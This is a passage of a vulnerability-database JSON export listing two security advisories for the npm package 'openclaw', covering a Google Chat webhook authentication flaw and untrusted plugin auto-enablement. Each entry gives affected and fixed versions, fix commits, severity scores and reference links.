`openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/googlechat/src/auth.ts now requires expectedAddOnPrincipal matching for add-on principals and rejects unexpected issuers.\n- extensions/googlechat/src/monitor-webhook.ts passes the configured appPrincipal into auth verification for the shipped webhook path.\n\nOpenClaw thanks @ijxpwastaken for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35622","reference_id":"","reference_type":"","scores":[{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22596","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22641","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22656","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35622"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{
"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_eleme
nts":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35622","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35622"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook"},{"reference_url":"https://github.com/advisories/GHSA-mp66-rf4f-mhh8","reference_id":"GHSA-mp66-rf4f-mhh8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mp66-rf4f-mhh8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilitie
s":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b
8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf
5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ub
k"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqh
r"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35622","GHSA-mp66-rf4f-mhh8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aja9-wzp2-kbcj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89095?format=json","vulnerability_id":"VCID-arks-g6hw-abbw","summary":"OpenClaw: Workspace provider auth choices could auto-enable untrusted provider plugins\n## Summary\n\nWorkspace provider auth choices could auto-enable untrusted provider plugins.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nNon-interactive onboarding could select a provider auth choice shadowed by an untrusted workspace plugin, auto-enabling that plugin during auth setup.\n\n## Technical Details\n\nThe fix prefers trusted provider origins for auth choices and excludes untrusted workspace choices unless they are explicitly enabled.\n\n## Fix\n\nThe issue was fixed in #62368. 
The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d97eae53e212ae26f3aebcd6a50ffc6877f770d`\n- PR: #62368\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43569","reference_id":"","reference_type":"","scores":[{"value":"0.00107","scoring_system":"epss","scoring_elements":"0.28508","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00116","scoring_system":"epss","scoring_elements":"0.29982","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00116","scoring_system":"epss","scoring_elements":"0.30011","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43569"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2d97eae53e212ae26f3aebcd6a50ffc6877f770d","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring
_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2d97eae53e212ae26f3aebcd6a50ffc6877f770d"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62368","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62368"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-939r-rj45-g2rj","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-939r-rj45-g2rj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43569","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/
CVE-2026-43569"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-untrusted-provider-plugin-auto-enablement-via-workspace-provider-auth","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-untrusted-provider-plugin-auto-enablement-via-workspace-provider-auth"},{"reference_url":"https://github.com/advisories/GHSA-939r-rj45-g2rj","reference_id":"GHSA-939r-rj45-g2rj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-939r-rj45-g2rj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110121?format=json","purl":"pkg:npm/openclaw@2026.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-c25h-kh
ws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-k8x3-9pv7-rfax"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rvcq-rqbq-4khp"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"}],"aliases":["CVE-2026-43569","GHSA-939r-rj45-g2rj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-arks-g6hw-abbw"},{"url":"http://pub
